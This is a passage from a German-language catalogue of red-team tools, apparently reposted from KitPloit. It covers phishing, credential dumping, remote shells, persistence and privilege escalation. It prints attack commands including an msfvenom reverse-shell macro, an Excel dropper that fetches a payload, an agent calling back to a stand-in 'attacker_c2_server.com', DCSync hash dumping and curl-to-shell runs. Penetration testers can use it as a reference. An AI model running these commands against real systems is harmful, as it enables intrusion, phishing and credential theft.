**Installation:**```bash
git clone https://github.com/IO1337/social-engineering-toolkit; cd set; python setup.py install

Verwendung:```bash python3 setoolkit

root@kitploit:~
![image](https://assets.kitploit.com/production/public/readmes/147/962be1664db4237288b6ac2bf77cb98be8c69715d67efdc36178eb16e8178e1c.png)

### [🔙](#tool-list)[Hydra](https://github.com/vanhauser-thc/thc-hydra)

Nützliches Tool für Brute-Force-Angriffe auf Anmeldungen. Kann eine Reihe von Diensten wie SSH, FTP, TELNET, HTTP usw. angreifen.

**Installation:**```bash
sudo apt install hydra

Verwendung:```bash hydra -L USER.TXT -P PASS.TXT 1.1.1.1 http-post-form "login.php:username-^USER^&password=^PASS^:Error" hydra -L USER.TXT -P PASS.TXT 1.1.1.1 ssh

root@kitploit:~
![image](https://assets.kitploit.com/production/public/readmes/147/c1f8846e81658f9a3679da0ff42c1efc12d30861a6a706c61449b956e14f8417.png)

### [🔙](#tool-list)[SquarePhish](https://github.com/secureworks/squarephish)

SquarePhish ist ein fortschrittliches Phishing-Tool, das eine Technik verwendet, die den OAuth-Gerätecode-Authentifizierungsablauf und QR-Codes kombiniert (Siehe [PhishInSuits](https://github.com/secureworks/PhishInSuits) für weitere Informationen über den OAuth-Gerätecode-Ablauf für Phishing-Angriffe).

Angriffsschritte:

- Bösartigen QR-Code an das Opfer senden
- Opfer scannt QR-Code mit mobilem Gerät
- Opfer wird zu einem vom Angreifer kontrollierten Server geleitet (Auslösen des OAuth-Gerätecode-Authentifizierungsablaufs)
- Opfer erhält MFA-Code per E-Mail (Auslösen des 15-Minuten-Timers des OAuth-Gerätecode-Ablaufs)
- Angreifer fragt nach Authentifizierung
- Opfer gibt Code auf legitimer Microsoft-Website ein
- Angreifer speichert Authentifizierungstoken

**Installation:**```bash
git clone https://github.com/secureworks/squarephish; cd squarephish; pip install -r requirements.txt

Hinweis: Bevor Sie eines der Module verwenden, aktualisieren Sie die erforderlichen Informationen in der settings.config-Datei, die mit Required gekennzeichnet sind.

Verwendung (E-Mail-Modul):``` usage: squish.py email [-h] [-c CONFIG] [--debug] [-e EMAIL]

optional arguments: -h, --help show this help message and exit

-c CONFIG, --config CONFIG squarephish config file [Default: settings.config]

--debug enable server debugging

-e EMAIL, --email EMAIL victim email address to send initial QR code email to

root@kitploit:~
**Verwendung (Server-Modul):**```
usage: squish.py server [-h] [-c CONFIG] [--debug]

optional arguments:
  -h, --help            show this help message and exit

  -c CONFIG, --config CONFIG
                        squarephish config file [Default: settings.config]

  --debug               enable server debugging

image

🔙King Phisher

King Phisher ist ein Werkzeug, mit dem Angreifer Phishing-E-Mails erstellen und an Opfer senden können, um an vertrauliche Informationen zu gelangen.

Es verfügt über Funktionen wie anpassbare Vorlagen, Kampagnenverwaltung und E-Mail-Versandfunktionen, was es zu einem leistungsstarken und einfach zu bedienenden Werkzeug für die Durchführung von Phishing-Angriffen macht. Mit King Phisher können Angreifer Einzelpersonen oder Organisationen mit gezielten und überzeugenden Phishing-E-Mails ins Visier nehmen, was die Erfolgschancen ihrer Angriffe erhöht.

Installation (Linux - Client & Server):```bash wget -q https://github.com/securestate/king-phisher/raw/master/tools/install.sh &&
sudo bash ./install.sh

root@kitploit:~
**Verwendung:**

Nach der Installation von King Phisher folgen Sie bitte der [Wiki-Seite](https://github.com/rsmusllp/king-phisher/wiki/Getting-Started), um SSH, Datenbankkonfiguration, SMTP-Server usw. einzurichten.

![image](https://assets.kitploit.com/production/public/readmes/147/ab8900f24709e60727b9ae8d91dc00da72eb17a099da35552cfd09ad542e20b5.png)

Ausführung
====================

### [🔙](#tool-list)[Responder](https://github.com/SpiderLabs/Responder)

Responder ist ein Werkzeug zum Vergiften der LLMNR- und NBT-NS-Protokolle in einem Netzwerk, um die Erfassung von Anmeldeinformationen und die Ausführung beliebigen Codes zu ermöglichen.

Die LLMNR (Link-Local Multicast Name Resolution) und NBT-NS (NetBIOS Name Service) Protokolle werden von Windows-Systemen verwendet, um Hostnamen in IP-Adressen in einem lokalen Netzwerk aufzulösen. Wenn ein Hostname mit diesen Protokollen nicht aufgelöst werden kann, sendet das System eine Broadcast-Anfrage für den Hostnamen an das lokale Netzwerk. 

Responder horcht auf diese Broadcasts und antwortet mit einer gefälschten IP-Adresse, wodurch das anfragende System dazu gebracht wird, seine Anmeldeinformationen an den Angreifer zu senden.

**Installation:**```bash
git clone https://github.com/SpiderLabs/Responder#usage
cd Responder

Verwendung:```bash

Running the tool

./Responder.py [options]

Typical usage

./Responder.py -I eth0 -wrf

root@kitploit:~
Full usage information can be found [here](https://github.com/SpiderLabs/Responder#usage).

![image](https://assets.kitploit.com/production/public/readmes/147/1557d2d9375fcf140ae01d21311d11ce93eabb676e40f6eb39ec25e0f4959c12.png)

*Bild verwendet von https://www.4armed.com/blog/llmnr-nbtns-poisoning-using-responder/*

### [🔙](#tool-list)[secretsdump](https://github.com/fortra/impacket/blob/master/examples/secretsdump.py)

Ein Dienstprogramm, das Teil der Impacket-Bibliothek ist und verwendet werden kann, um Passwort-Hashes und andere Geheimnisse aus einem Windows-System zu extrahieren.

Dies geschieht durch Interaktion mit der Security Account Manager (SAM)-Datenbank auf dem System und das Extrahieren der gehashten Passwörter und anderer Informationen, wie z.B.:

- Passwort-Hashes für lokale Konten
- Kerberos-Tickets und -Schlüssel
- LSA Secrets

**Installation:**```bash
python3 -m pip install impacket

Verwendung:```bash

Extract NTLM hashes with local files

secretsdump.py -ntds /root/ntds_cracking/ntds.dit -system /root/ntds_cracking/systemhive LOCAL

DCSync attack and dump the NTLM hashes of all domain users.

secretsdump.py -dc-ip 10.10.10.30 MEGACORP.LOCAL/svc_bes:[email protected]

root@kitploit:~
![image](https://assets.kitploit.com/production/public/readmes/147/e9e242c346297388c540da63c467f568ea0b33980e52d48bd8154d745147f192.png)

*Bild verwendet von https://riccardoancarani.github.io/2020-05-10-hunting-for-impacket/#secretsdumppy*

### [🔙](#tool-list)[evil-winrm](https://github.com/Hackplayers/evil-winrm)

Evil-WinRM ist ein Tool, das eine Befehlszeilenschnittstelle für Windows Remote Management bereitstellt (WinRM: *Ein Dienst, der Administratoren die Möglichkeit gibt, Befehle auf einem Windows-Computer remote auszuführen.*).

Evil-WinRM ermöglicht es einem Angreifer, mithilfe von WinRM eine Remoteverbindung zu einem Windows-Computer herzustellen und beliebige Befehle auszuführen.

Einige Funktionen umfassen:

- Laden von PowerShell-Skripten in den Arbeitsspeicher
- Laden von DLL-Dateien in den Arbeitsspeicher, die einige AVs umgehen
- Laden von x64-Payloads
- Pass-the-Hash-Unterstützung
- Hoch- und Herunterladen von lokalen und entfernten Dateien

**Installation: (Git)**```bash
sudo gem install winrm winrm-fs stringio logger fileutils
git clone https://github.com/Hackplayers/evil-winrm.git
cd evil-winrm

Installieren: (Ruby gem)```bash gem install evil-winrm

root@kitploit:~
Alternative Installationsanweisungen finden Sie [hier](https://github.com/Hackplayers/evil-winrm#installation--quick-start-4-methoden).

**Verwendung:**```bash
# Connect to 192.168.1.100 as Administrator with custom exe/ps1 download folder locations
evil-winrm  -i 192.168.1.100 -u Administrator -p 'MySuperSecr3tPass123!' -s '/home/foo/ps1_scripts/' -e '/home/foo/exe_files/'

# Upload local files to victim
upload local_filename
upload local_filename destination_filename

# Download remote files to local machine
download remote_filename
download remote_filename destination_filename

# Execute .Net assembly into victim memory
Invoke-Binary /opt/csharp/Rubeus.exe

# Load DLL library into victim memory
Dll-Loader -http http://10.10.10.10/SharpSploit.dll

Die vollständige Nutzungsdokumentation finden Sie hier.

image

Bild verwendet von https://korbinian-spielvogel.de/posts/heist-writeup/

🔙Donut

Ein Tool zur Ausführung von VBScript, JScript, EXE, DLL-Dateien und dotNET-Assemblys im Arbeitsspeicher. Es kann verwendet werden, um benutzerdefinierte Payloads auf Zielsystemen zu laden und auszuführen, ohne dass Dateien auf die Festplatte geschrieben werden müssen.

Installation: (Windows)```bash git clone http://github.com/thewover/donut.git

root@kitploit:~
Um die Loader-Vorlage, die dynamische Bibliothek donut.dll, die statische Bibliothek donut.lib und den Generator donut.exe zu generieren, starten Sie eine x64-Eingabeaufforderung für Microsoft Visual Studio-Entwickler, wechseln Sie in das Verzeichnis, in das Sie das Donut-Repository geklont haben, und geben Sie Folgendes ein:```bash
nmake -f Makefile.msvc

Um dasselbe zu tun, außer mit MinGW-64 unter Windows oder Linux, wechseln Sie in das Verzeichnis, in das Sie das Donut-Repository geklont haben, und geben Sie Folgendes ein:```bash make -f Makefile.mingw

root@kitploit:~
**Installation: (Linux)**```bash
pip3 install donut-shellcode

Verwendung:```bash

Creating shellcode from an XSL file that pops up a calculator.

shellcode = donut.create(file=r"C:\Tools\Source\Repos\donut\calc.xsl")

Creating shellcode from an unmanaged DLL. Invokes DLLMain.

shellcode = donut.create(file=r"C:\Tools\Source\Repos\donut\payload\test\hello.dll")

root@kitploit:~
Für vollständige Nutzungsinformationen siehe die Donut [GitHub-Seite](https://github.com/TheWover/donut/#4-usage).

Siehe [einen kürzlichen Blogbeitrag](https://thewover.github.io/Bear-Claw/) von The Wover für weitere Informationen.

![image](https://assets.kitploit.com/production/public/readmes/147/f1dba24c73e1bc864c83173904c6592faee2f8aa854da293767b90d69449d5c4.png)

### [🔙](#tool-list)[Macro_pack](https://github.com/sevagas/macro_pack)

Ein Tool zur Automatisierung der Verschleierung und Erstellung von Office-Dokumenten, VB-Skripten, Verknüpfungen und anderen Formaten für Red Teaming.

**Installation: (Binär)** 

1. Holen Sie die neueste Binärdatei von [https://github.com/sevagas/macro_pack/releases/](https://github.com/sevagas/macro_pack/releases/)
2. Laden Sie die Binärdatei auf einen PC mit installiertem originalem Microsoft Office herunter.
3. Öffnen Sie die Konsole, wechseln Sie zum Binärverzeichnis und rufen Sie die Binärdatei auf.

**Installation: (Git)**```bash
git clone https://github.com/sevagas/macro_pack.git
cd macro_pack
pip3 install -r requirements.txt

Verwendung:```bash

Help Page

python3 macro_pack.py --help

List all supported file formats

macro_pack.exe --listformats

Obfuscate the vba file generated by msfvenom and puts result in a new VBA file.

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.5 -f vba | macro_pack.exe -o -G meterobf.vba

Obfuscate Empire stager VBA file and generate a MS Word document:

macro_pack.exe -f empire.vba -o -G myDoc.docm

Generate an MS Excel file containing an obfuscated dropper (download payload.exe and store as dropped.exe)

echo "https://myurl.url/payload.exe" "dropped.exe" | macro_pack.exe -o -t DROPPER -G "drop.xlsm"

Execute calc.exe via Dynamic Data Exchange (DDE) attack

echo calc.exe | macro_pack.exe --dde -G calc.xslx

root@kitploit:~
![image](https://assets.kitploit.com/production/public/readmes/147/05a46a14fba117c71b6b79cec0cccbc403531a302add46b9e55035e7d9d634ef.png)

### [🔙](#tool-list)[PowerSploit](https://github.com/PowerShellMafia/PowerSploit)

Eine Sammlung von PowerShell-Skripten und -Modulen, die verwendet werden können, um eine Vielzahl von Red-Teaming-Zielen zu erreichen.

Einige der Funktionen von PowerSploit:

- Passwort-Hashes auslesen und Klartext-Passwörter aus dem Arbeitsspeicher extrahieren
- Berechtigungen erweitern und Sicherheitskontrollen umgehen
- Beliebigen PowerShell-Code ausführen und Ausführungsbeschränkungen umgehen
- Netzwerkaufklärung und -erkundung durchführen
- Payloads generieren und Exploits ausführen

**Installieren:** *1. In den PowerShell-Module-Ordner speichern*

Zuerst müssen Sie den [PowerSploit-Ordner](https://github.com/PowerShellMafia/PowerSploit) herunterladen und in Ihren PowerShell-Module-Ordner speichern.

Den Pfad zu Ihrem PowerShell-Module-Ordner finden Sie mit folgendem Befehl:```
$Env:PSModulePath

Installation: 2. PowerSploit als PowerShell-Modul installieren

Sie müssen dann das PowerSploit-Modul installieren (verwenden Sie den Namen des heruntergeladenen Ordners).

Hinweis: Ihre PowerShell-Ausführungsrichtlinie könnte Sie blockieren. Führen Sie den folgenden Befehl aus, um dies zu beheben.

Set-ExecutionPolicy Unrestricted``` powershell.exe -ep bypass

root@kitploit:~
Jetzt können Sie das PowerSploit-Modul installieren.```
Import-Module PowerSploit

Verwendung:``` Get-Command -Module PowerSploit

root@kitploit:~
![image](https://assets.kitploit.com/production/public/readmes/147/be1d37fac661a710be1a2268f5f0090e13b496c05f8d22b56d47e166072e5fff.png)

### [🔙](#tool-list)[Rubeus](https://github.com/GhostPack/Rubeus)

Ein Tool, das verwendet werden kann, um verschiedene Aktionen im Zusammenhang mit Microsoft Active Directory (AD)-Umgebungen durchzuführen, wie das Auslesen von Passwort-Hashes, das Erstellen/Löschen von Benutzern und das Ändern von Benutzereigenschaften.

Einige der Funktionen von Rubeus:

- Kerberoasting
- Golden-Ticket-Angriffe
- Silver-Ticket-Angriffe

**Installation: (Download)** 

Sie können die inoffizielle vorkompilierte Rubeus-Binärdatei [hier](https://github.com/r3motecontrol/Ghostpack-CompiledBinaries/blob/master/Rubeus.exe) installieren.

**Installation: (Kompilieren)** 

Rubeus ist kompatibel mit [Visual Studio 2019 Community Edition](https://visualstudio.microsoft.com/vs/community/). Öffnen Sie das Rubeus-[Projekt .sln](https://github.com/GhostPack/Rubeus), wählen Sie "Release" und erstellen Sie es.

**Verwendung:**```
Rubeus.exe -h

image

🔙SharpUp

Ein nützliches Tool zur Überprüfung eines Endpunkts eines Opfers auf Schwachstellen im Zusammenhang mit Prozessen mit hoher Integrität, Gruppen, kaperbaren Pfaden usw.

Installation: (Download)

Sie können das inoffizielle vorkompilierte SharpUp-Binary hier installieren.

Installation: (Kompilieren)

SharpUp ist kompatibel mit Visual Studio 2015 Community Edition. Öffnen Sie das SharpUp Projekt .sln, wählen Sie "Release", und erstellen Sie es.

Verwendung:```bash SharpUp.exe audit #-> Runs all vulnerability checks regardless of integrity level or group membership.

SharpUp.exe HijackablePaths #-> Check only if there are modifiable paths in the user's %PATH% variable.

SharpUp.exe audit HijackablePaths #-> Check only for modifiable paths in the user's %PATH% regardless of integrity level or group membership.

root@kitploit:~
![image](https://assets.kitploit.com/production/public/readmes/147/881494f39c898e7951e05d177aeaef111636ae85c7a4c9a607f337e3318f7d77.png)

### [🔙](#tool-list)[SQLRecon](https://github.com/skahwah/SQLRecon)

MS-SQL (Microsoft SQL Server) ist ein relationales Datenbankmanagementsystem, das von Microsoft entwickelt und vertrieben wird.

Dieses C# MS-SQL-Toolkit ist für offensive Aufklärung und Post-Exploitation konzipiert. Detaillierte Nutzungsinformationen zu jeder Technik finden Sie im [Wiki](https://github.com/skahwah/SQLRecon/wiki).

**Installation: (Binär)**

Sie können die neueste Binärversion von [hier](https://github.com/skahwah/SQLRecon/releases) herunterladen.

**Verwendung:**```bash
# Authenticating using Windows credentials
SQLRecon.exe -a Windows -s SQL01 -d master -m whoami

# Authenticating using Local credentials
SQLRecon.exe -a Local -s SQL02 -d master -u sa -p Password123 -m whoami

# Authenticating using Azure AD credentials
SQLRecon.exe -a azure -s azure.domain.com -d master -r domain.com -u skawa -p Password123 -m whoami

# Run whoami
SQLRecon.exe -a Windows -s SQL01 -d master -m whoami

# View databases
SQLRecon.exe -a Windows -s SQL01 -d master -m databases

# View tables
SQLRecon.exe -a Windows -s SQL01 -d master -m tables -o AdventureWorksLT2019

Vollständige Nutzungsinformationen finden Sie im Wiki.

Informationen zur Nutzung der Toolmodule finden Sie hier.

image

Bild von der SQLRecon-Hilfeseite

🔙UltimateAppLockerByPassList

Diese Ressource ist eine Sammlung der gängigsten und bekannten Techniken zur Umgehung von AppLocker.

Da AppLocker auf verschiedene Weisen konfiguriert werden kann, pflegt @api0cradle eine verifizierte Liste von Umgehungen (die gegen die standardmäßigen AppLocker-Regeln funktioniert) und eine Liste mit möglichen Umgehungstechniken (abhängig von der Konfiguration) oder solchen, die von jemandem als Umgehung behauptet werden.

Sie haben auch eine Liste generischer Umgehungstechniken sowie eine Legacy-Liste von Methoden zur Ausführung über DLLs.

Indizierte Listen

  • Generic-AppLockerbypasses.md
  • VerifiedAppLockerBypasses.md
  • UnverifiedAppLockerBypasses.md
  • DLL-Execution.md

image

Bild verwendet von https://github.com/api0cradle/UltimateAppLockerByPassList

🔙StarFighters

Ein auf JavaScript und VBScript basierender Empire-Launcher, der in einem eigenen eingebetteten PowerShell-Host läuft.

Beide Launcher laufen in einem eigenen eingebetteten PowerShell-Host, sodass wir PowerShell.exe nicht benötigen.

Dies kann nützlich sein, wenn ein Unternehmen PowerShell.exe blockiert und/oder eine Application-Whitelisting-Lösung verwendet, aber das Ausführen von JS/VBS-Dateien nicht blockiert.

Nutzung:

  • Richten Sie einen neuen Listener in PowerShell Empire ein.
  • Verwenden Sie den Befehl Launcher, um einen PowerShell-Launcher für diesen Listener zu generieren.
  • Kopieren und ersetzen Sie die Base64-kodierte Launcher-Payload in der StarFighter JavaScript- oder VBScript-Datei.

Für die JavaScript-Version verwenden Sie die folgende Variable:```javascript var EncodedPayload = ""

root@kitploit:~
Für die VBScript-Version verwende die folgende Variable:```vbscript
  Dim EncodedPayload: EncodedPayload = "<Paste Encoded Launcher Payload Here>"
  • Dann führen Sie auf dem Ziel aus: wscript.exe StarFighter.js oder StarFighter.vbs, oder doppelklicken Sie die Starter im Explorer.

image

Bild verwendet von https://www.hackplayers.com/2017/06/startfighters-un-launcher-de-empire-en-js-vbs.html

🔙demiguise

Ziel dieses Projekts ist es, .html-Dateien zu generieren, die eine verschlüsselte HTA-Datei enthalten.

Die Idee ist, dass, wenn Ihr Ziel die Seite besucht, der Schlüssel abgerufen und die HTA dynamisch im Browser entschlüsselt und direkt an den Benutzer übermittelt wird.

Dies ist eine Umgehungstechnik, um die von einigen Sicherheitsgeräten durchgeführte Inhalts-/Dateityp-Inspektion zu umgehen.

Weitere technische Informationen hier.

Installation:``` git clone https://github.com/nccgroup/demiguise cd demiguise

root@kitploit:~
**Verwendung:**```bash
# Generate an encrypted .hta file that executes notepad.exe
python demiguise.py -k hello -c "notepad.exe" -p Outlook.Application -o test.hta

image

Bild verwendet von https://github.com/nccgroup/demiguise

🔙PowerZure

PowerZure ist ein PowerShell-Projekt, das zur Bewertung und Ausnutzung von Ressourcen in der Microsoft-Cloud-Plattform Azure entwickelt wurde. PowerZure wurde aus der Notwendigkeit heraus entwickelt, ein Framework zu schaffen, das sowohl Aufklärung als auch Ausnutzung von Azure, AzureAD und den zugehörigen Ressourcen durchführen kann.

Es gibt keinerlei Grund, PowerZure jemals auf einem Opferrechner auszuführen. Die Authentifizierung erfolgt entweder mithilfe einer vorhandenen accesstoken.json-Datei oder durch Anmeldeaufforderung beim Einloggen in Azure. Das bedeutet, dass Sie PowerZure sicher verwenden können, um von Ihrem eigenen Rechner aus mit der Cloud-Instanz eines Opfers zu interagieren.

Installation:```bash Install-Module -Name Az git clone https://github.com/hausec/PowerZure cd PowerZure ipmo C:\path\to\PowerZure.psd1

root@kitploit:~
**Verwendung:**```bash
# Get a list of AzureAD and Azure objects you have access to
Get-AzureTarget

Blog - Angriff auf Azure, Azure AD und Einführung von PowerZure

Bild

Bild verwendet von https://hakin9.org

Persistenz

🔙Impacket

Impacket bietet eine Reihe von Low-Level-Python-Bindungen für verschiedene Netzwerkprotokolle, darunter SMB, Kerberos und LDAP, sowie höherwertige Bibliotheken zur Interaktion mit Netzwerkdiensten und zur Ausführung spezifischer Aufgaben wie dem Auslesen von Passwort-Hashes und dem Erstellen von Netzwerkfreigaben.

Es enthält auch eine Reihe von Befehlszeilentools, die zur Durchführung verschiedener Aufgaben wie dem Auslesen von SAM-Datenbanken, dem Aufzählen von Domänenvertrauensstellungen und dem Knacken von Windows-Passwörtern verwendet werden können.

Installation:```bash python3 -m pip install impacket

root@kitploit:~
**Installation: (mit Beispielskripten)** 

Laden Sie [das Paket](https://github.com/fortra/impacket) herunter und entpacken Sie es, navigieren Sie dann zum Installationsverzeichnis und führen Sie aus...```bash
python3 -m pip install .

Verwendung:```bash

Extract NTLM hashes with local files

secretsdump.py -ntds /root/ntds_cracking/ntds.dit -system /root/ntds_cracking/systemhive LOCAL

Gets a list of the sessions opened at the remote hosts

netview.py domain/user:password -target 192.168.10.2

Retrieves the MSSQL instances names from the target host.

mssqlinstance.py 192.168.1.2

This script will gather data about the domain's users and their corresponding email addresses.

GetADUsers.py domain/user:password@IP

root@kitploit:~
Tolle [Cheat Sheet](https://cheatsheet.haax.fr/windows-systems/exploitation/impacket/) zur Verwendung von Impacket.

![image](https://assets.kitploit.com/production/public/readmes/147/2be6291c92daeeea07d0afe27bcf2ecde2bd9676d07e84e8b7c6ee823887e902.png)

### [🔙](#tool-list)[Empire](https://github.com/EmpireProject/Empire)

Empire ist ein Post-Exploitation-Framework, mit dem Sie Payloads generieren können, um Remote-Verbindungen zu Opfersystemen herzustellen.

Sobald ein Payload auf einem Opfersystem ausgeführt wurde, stellt es eine Verbindung zurück zum Empire-Server her, der dann verwendet werden kann, um Befehle zu erteilen und das Zielsystem zu steuern.

Empire enthält außerdem eine Reihe integrierter Module und Skripte, mit denen bestimmte Aufgaben ausgeführt werden können, wie das Auslesen von Passwort-Hashes, das Zugreifen auf die Windows-Registrierung und das Exfiltrieren von Daten.

**Install:**```bash
git clone https://github.com/EmpireProject/Empire
cd Empire
sudo ./setup/install.sh

Verwendung:```bash

Start Empire

./empire

List live agents

list agents

List live listeners

list listeners

root@kitploit:~
Nützliches [Spickzettel](https://github.com/HarmJ0y/CheatSheets/blob/master/Empire.pdf) von [HarmJoy](https://github.com/HarmJ0y).

![image](https://assets.kitploit.com/production/public/readmes/147/3dec2ca6692f2b6431159a32830e854fa994824b8bcf12c797c0bda8a186519d.png)

### [🔙](#tool-list)[SharPersist](https://github.com/mandiant/SharPersist)

Ein Windows-Persistenz-Toolkit geschrieben in C#.

Das Projekt hat ein [Wiki](https://github.com/mandiant/SharPersist/wiki).

**Installation: (Binär)**

Die aktuellste Version finden Sie [hier](https://github.com/mandiant/SharPersist/releases).

**Installation: (Kompilieren)**

- Laden Sie die Projektdateien aus dem [GitHub-Repo](https://github.com/mandiant/SharPersist) herunter.
- Öffnen Sie das Visual Studio-Projekt und gehen Sie zu "Extras" --> "NuGet-Paket-Manager" --> "Paket-Manager-Einstellungen"
- Gehen Sie zu "NuGet-Paket-Manager" --> "Paketquellen"
- Fügen Sie eine Paketquelle mit der URL "https://api.nuget.org/v3/index.json" hinzu
- Installieren Sie das Costura.Fody NuGet-Paket. Die ältere Version von Costura.Fody (3.3.3) wird benötigt, damit Sie Visual Studio 2019 nicht benötigen.
	- `Install-Package Costura.Fody -Version 3.3.3`
- Installieren Sie das TaskScheduler-Paket
	- `Install-Package TaskScheduler -Version 2.8.11`
- Sie können nun das Projekt selbst erstellen!

**Verwendung:**

Eine vollständige Liste der Verwendungsbeispiele finden Sie [hier](https://github.com/mandiant/SharPersist#adding-persistence-triggers-add).```
#KeePass
SharPersist -t keepass -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -f "C:\Users\username\AppData\Roaming\KeePass\KeePass.config.xml" -m add 

#Registry
SharPersist -t reg -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -k "hkcurun" -v "Test Stuff" -m add

#Scheduled Task Backdoor
SharPersist -t schtaskbackdoor -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Something Cool" -m add

#Startup Folder
SharPersist -t startupfolder -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -f "Some File" -m add

image

🔙ligolo-ng

Ligolo-ng ist ein einfaches, leichtgewichtiges und schnelles Tool, das Pentestern ermöglicht, Tunnels über eine reverse TCP/TLS-Verbindung mithilfe einer tun-Schnittstelle aufzubauen (ohne die Notwendigkeit von SOCKS).

Anstatt einen SOCKS-Proxy oder TCP/UDP-Weiterleitungen zu verwenden, erstellt Ligolo-ng einen Userspace-Netzwerkstack mit Gvisor.

Beim Ausführen des Relay/Proxy-Servers wird eine tun-Schnittstelle verwendet; Pakete, die an diese Schnittstelle gesendet werden, werden übersetzt und dann an das entfernte Netzwerk des Agents übertragen.

Installation: (Download)

Vorkompilierte Binärdateien (Windows/Linux/macOS) sind auf der Release-Seite verfügbar.

Installation: (Build)

Building ligolo-ng (Go >= 1.17 wird benötigt):```bash go build -o agent cmd/agent/main.go go build -o proxy cmd/proxy/main.go

Build for Windows

GOOS=windows go build -o agent.exe cmd/agent/main.go GOOS=windows go build -o proxy.exe cmd/proxy/main.go

root@kitploit:~
**Einrichtung: (Linux)**```bash
sudo ip tuntap add user [your_username] mode tun ligolo
sudo ip link set ligolo up

Einrichtung: (Windows)

Sie müssen den Wintun-Treiber herunterladen (der von WireGuard verwendet wird) und die wintun.dll in denselben Ordner wie Ligolo legen (stellen Sie sicher, dass Sie die richtige Architektur verwenden).

Einrichtung: (Proxy-Server)```bash ./proxy -h # Help options ./proxy -autocert # Automatically request LetsEncrypt certificates

root@kitploit:~
**Verwendung:**

*Starten Sie den Agenten auf Ihrem Zielcomputer (Opfer) (keine Berechtigungen erforderlich!):*```bash
./agent -connect attacker_c2_server.com:11601

Eine Sitzung sollte auf dem Proxy-Server erscheinen.``` INFO[0102] Agent joined. name=nchatelain@nworkstation remote="XX.XX.XX.XX:38000"

root@kitploit:~
Verwenden Sie den Befehl session, um den Agenten auszuwählen.```
ligolo-ng » session 
? Specify a session : 1 - nchatelain@nworkstation - XX.XX.XX.XX:38000

Vollständige Nutzungsinformationen finden Sie hier.

image

Bild verwendet von https://github.com/nicocha30/ligolo-ng#demo

Privilege Escalation

🔙Crassus

"Accenture hat ein Tool namens Spartacus entwickelt, das DLL-Hijacking-Möglichkeiten unter Windows findet. Ausgehend von Spartacus haben wir Crassus entwickelt, um die Fähigkeiten zur Windows-Privilegieneskalation über die reine Suche nach fehlenden Dateien hinaus zu erweitern. Die ACLs, die von Dateien und Verzeichnissen privilegierter Prozesse verwendet werden, können mehr finden, als nur nach fehlenden Dateien zu suchen, um das Ziel zu erreichen." - Link

Installation: (Build)

Crassus wurde als Visual Studio 2019-Projekt entwickelt. So erstellen Sie Crassus.exe:

  1. Öffnen Sie Crassus.sln
  2. Drücken Sie auf Ihrer Tastatur Strg+Umschalt+B

Installation: (vorkompiliert)

Wenn Sie darauf vertrauen, fremden Code auszuführen, ohne zu wissen, was er tut, wird Crassus.exe in diesem Repository bereitgestellt.

Verwendung:

  1. Wählen Sie im Process Monitor die Option Enable Boot Logging aus.
  2. Führen Sie einen Neustart durch.
  3. Nachdem Sie sich angemeldet haben und Windows zur Ruhe gekommen ist, führen Sie optional auch geplante Aufgaben aus, die möglicherweise mit Privilegien ausgeführt werden.
  4. Führen Sie Process Monitor erneut aus.
  5. Speichern Sie auf Aufforderung hin das Startprotokoll.
  6. Setzen Sie den Standardfilter des Process Monitors mit Strg-R zurück.
  7. Speichern Sie diese Protokolldatei, z. B. als boot.PML. Der Grund für das erneute Speichern der Protokolldatei ist ein zweifacher:
    1. Ältere Versionen des Process Monitors speichern Startprotokolle nicht als einzelne Datei.
    2. Startprotokolle sind standardmäßig ungefiltert, was zusätzliches Rauschen enthalten kann, wie z. B. einen DLL-Hijack eines lokalen Benutzers beim Start von Process Monitor selbst.

Crassus

Bild verwendet von https://github.com/vu-ls/Crassus?tab=readme-ov-file#screenshots

🔙LinPEAS

LinPEAS ist ein schönes, ausführliches Tool zur Privilegieneskalation, um lokale Privesc-Wege auf Linux-Endpunkten zu finden.

Installation + Verwendung:```bash curl -L "https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh" | sh

root@kitploit:~
![image](https://assets.kitploit.com/production/public/readmes/147/75977a81eeb607a2ef06b8524e1792579aa3dc5b245596ee7eeed5938d75f279.png)

### [🔙](#tool-list)[WinPEAS](https://github.com/carlospolop/PEASS-ng/tree/master/winPEAS)

WinPEAS ist ein nützliches, ausführliches Tool zur Privilegieneskalation, um lokale Privesc-Wege auf Windows-Endpunkten zu finden.

**Installation + Nutzung:**```bash
$wp=[System.Reflection.Assembly]::Load([byte[]](Invoke-WebRequest "https://github.com/carlospolop/PEASS-ng/releases/latest/download/winPEASany_ofs.exe" -UseBasicParsing | Select-Object -ExpandProperty Content)); [winPEAS.Program]::Main("")

image

🔙linux-smart-enumeration

Linux smart enumeration ist ein weiteres gutes, weniger ausführliches Linux-Privilegieneskalationstool für Linux.

Installation + Verwendung:```bash curl "https://github.com/diego-treitos/linux-smart-enumeration/releases/latest/download/lse.sh" -Lo lse.sh;chmod 700 lse.sh

root@kitploit:~
![image](https://assets.kitploit.com/production/public/readmes/147/0d46a6a3c94f9ce73617ebb098962e9d6d630489e557e57adba93bd24d562808.png)

### [🔙](#tool-list)[Certify](https://github.com/GhostPack/Certify)

Certify ist ein C#-Tool zur Aufzählung und Ausnutzung von Fehlkonfigurationen in Active Directory Certificate Services (AD CS).

Certify ist für den Einsatz in Verbindung mit anderen Red-Team-Tools und -Techniken wie Mimikatz und PowerShell konzipiert, um Red Teamern die Durchführung verschiedener Angriffsarten zu ermöglichen, darunter Man-in-the-Middle-Angriffe, Identitätswechselangriffe und Privilegieneskalationsangriffe.

**Hauptfunktionen von Certify:**
 
- Zertifikatserstellung
- Zertifikatssignierung
- Zertifikatsimport
- Änderung des Zertifikatstrusts

**Installation: (Kompilieren)** 

Certify ist kompatibel mit [Visual Studio 2019 Community Edition](https://visualstudio.microsoft.com/vs/community/). Öffnen Sie das Certify-Projekt [.sln](https://github.com/GhostPack/Certify), wählen Sie "Release" und erstellen Sie es.

**Installation: (Ausführen von Certify über PowerShell)** 

Wenn Sie Certify im Arbeitsspeicher über einen PowerShell-Wrapper ausführen möchten, kompilieren Sie zunächst Certify und codieren Sie die resultierende Assembly base64:```bash
[Convert]::ToBase64String([IO.File]::ReadAllBytes("C:\Temp\Certify.exe")) | Out-File -Encoding ASCII C:\Temp\Certify.txt

